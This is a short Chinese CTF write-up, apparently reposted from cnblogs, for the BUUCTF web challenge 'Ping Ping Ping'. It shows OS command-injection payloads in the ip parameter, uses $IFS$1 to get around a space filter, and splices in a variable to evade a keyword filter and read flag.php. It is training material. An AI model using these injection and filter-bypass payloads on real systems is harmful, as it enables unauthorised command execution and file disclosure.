Buuctf-web-[GXYCTF2019]Ping Ping Ping

时间：2020-09-24 22:06:26 阅读：79 评论：0 收藏：0 [点我收藏+]

首先打开，然后后面跟着

/?ip=127.0.0.1|ls
找目录

技术分享图片

我们看到flag.php与index.php两个php文件。我们接着找flag.php

技术分享图片

看到提示空格被禁用绕过空格的方法大概有以下几种：

$IFS$(任意数字) cat${IFS}$1flag，尝试

技术分享图片

发现flag也被骚扰了，然后打开index.php，看看内容

技术分享图片

发现被过滤了好多，然后发现有个变量a，尝试替换拼接flag中的g

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

技术分享图片

flag{61584ea2-f679-45f5-b8c1-32bd1a13a0f5}

原文：https://www.cnblogs.com/tac2664/p/13726817.html

踩

(0)

评论一句话评论（0）

分享档案

更多>